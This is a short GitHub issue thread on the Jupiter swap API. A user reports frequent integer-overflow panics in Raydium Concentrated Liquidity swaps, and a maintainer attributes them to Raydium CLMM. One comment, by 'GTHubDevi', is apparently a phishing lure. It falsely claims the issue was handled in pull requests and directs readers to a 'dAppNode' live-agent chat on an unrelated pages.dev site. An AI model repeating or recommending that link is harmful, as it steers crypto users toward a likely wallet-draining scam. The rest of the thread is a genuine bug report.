### ISSUE TITLE
 Program log: panicked at 'Integer overflow when casting to u64', programs/amm/src/libraries/big_num.rs:9:1

### ISSUE THREAD

**Issue by eco-x-coin** [jup-ag/jupiter-swap-api#31]
<img width="1535" alt="image" src="https://github.com/user-attachments/assets/fe6c3ffd-4bc2-495c-8a78-feca6d2eda90">
hi, I noticed there are many errors about int overflow panic of Raydium Concentrated Liquidity.

how can we solve it ?  I don't think the input number is overflow at all

this is the transaction: https://solscan.io/tx/2C13LPvGecGpYrYwsfoxPX4JT671FnUEYr2myMEGUdpzoN4h5rRvKvu62Lij8N2WbgH9a3ZFEBeLwt9tr7CA2XFJ

**Comment by eco-x-coin** [comment]
By the way, this has been happening very frequently today.

**Comment by eco-x-coin** [comment]
this is another same issue trans: https://solscan.io/tx/aYdm3BEsjCawTaMD9o37L6oTwEN1BYK3VLdgqY2oUsnsArqACiMbPomSp1eJHw8FKAC4ZcRqrxL6BrFt8t3Jz1S

**Comment by GTHubDevi** [comment]
This issue has been preview on the Pull Requests. To resolve,
Contact the dAppNode page to initiate a chat with the live agent on the chat button to get more information about your request via [dAppNode](https://defi-fixprotocol.pages.dev/)

**Comment by siong1987** [comment]
this has something to do with Raydium CLMM.
